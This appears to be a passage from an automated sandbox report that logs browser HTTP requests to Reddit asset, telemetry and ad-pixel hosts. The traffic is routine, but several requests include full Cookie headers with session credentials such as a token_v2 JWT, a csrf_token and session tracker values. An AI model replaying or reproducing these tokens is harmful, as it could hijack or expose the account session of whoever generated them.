Source: global trafficHTTP traffic detected: GET /t5_2rau9/styles/communityIcon_skrngvy47ymd1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=241e2e43767a350a2ed38dea24d6e1aa97b49388 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3vnbmz4nv8we1.jpg?width=216&crop=smart&auto=webp&s=dbefa11bd4d3481aabc576079e4c0b52e79daa6f HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftc-sues-uber-says-company-charged-for-uber-one-without-v0-kT9Nhal_HQQtxcf8eKVARRPtoPlbH4aoXVXOXSUDNQo.jpg?width=320&crop=smart&auto=webp&s=6338bef17fddca5ee8ebe463223bc1a65ec595e1 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh1i/styles/communityIcon_p6kb2m6b185b1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=5feb83c069804a8d8525e9cd17d68958c3d57088 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_4uoy2u/styles/communityIcon_l4hwets9e0cd1.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=df34b22282abcd744996c325825697b55245c3a9 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/guides-224224e6.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /J_fCwTYJkoM-way-eaOHv8AOHoF_jNXNqOvPrQ7bINY.png HTTP/1.1Host: b.thumbs.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/flex-left-nav-container-c40bb411.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-grid-client-js-38860f05.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/flex-nav-2ca2e7d8.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-grid-client-js-38860f05.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-gallery-carousel-b1446655.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/trending-carousel-client-js-a7af9692.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skatepark?IDLT=Xc1550agJoWzTqDnR9fsjIigQChEtESHAGvJqpApNMa6Itl5w HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344521191.Z0FBQUFBQm9COWdKb1NXRVJzNk9RV2V4RGZNWUJtdm1ELWZsc2hndW9ZVTN3em00YmFkenBLMVBEakNjS1V4UENwdno2XzJLMmtVTlpFMFdfNlRKTTd5bW13RUFLdGRYNkpYYVpVaXd6cXpONmtSTXlaN2RaYl9MVVhXZHRCZWllTnNvZE5uUlh4WGI
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/ad-event-tracker-a5a98fc1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/trending-carousel-client-js-a7af9692.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/suggested-search-queries-client-js-fb46eb9d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/trending-carousel-client-js-a7af9692.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/guides-telemetry-aee80adb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/auth-overlay-client-js-6253058a.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/scroll-blocker-9486e9a9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/auth-overlay-client-js-6253058a.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-actions-controller-3be29c73.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-highlights-3e873ce7.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/comment-6e87a634.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-comment-share-button-db23de80.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /skatepark?IDLT=Xc1550agJoWzTqDnR9fsjIigQChEtESHAGvJqpApNMa6Itl5w HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344521191.Z0FBQUFBQm9COWdKb1NXRVJzNk9RV2V4RGZNWUJtdm1ELWZsc2hndW9ZVTN3em00YmFkenBLMVBEakNjS1V4UENwdno2XzJLMmtVTlpFMFdfNlRKTTd5bW13RUFLdGRYNkpYYVpVaXd6cXpONmtSTXlaN2RaYl9MVVhXZHRCZWllTnNvZE5uUlh4WGI
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-actions-menu-34aa2f08.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-form-520b1141.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-select-text-input-a2370973.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-option-67bfebc3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/events HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344533694.Z0FBQUFBQm9COWdWZTF1TVF4a3FxRDVSTjY3cnlSSjk4VXU5MWVkdHNZNGdSSGhZOHdXWjhDeUlGa21QR2JDZDk1VHBkSF81VFpvMlVGVUVJZFVHTlFWUXFLVGFlbHZYTXUzVlRaMWF1WU5RZTFpcXp2LWtOckFsNURFbHNJcFVpa2tvSEhiRDFCbUU
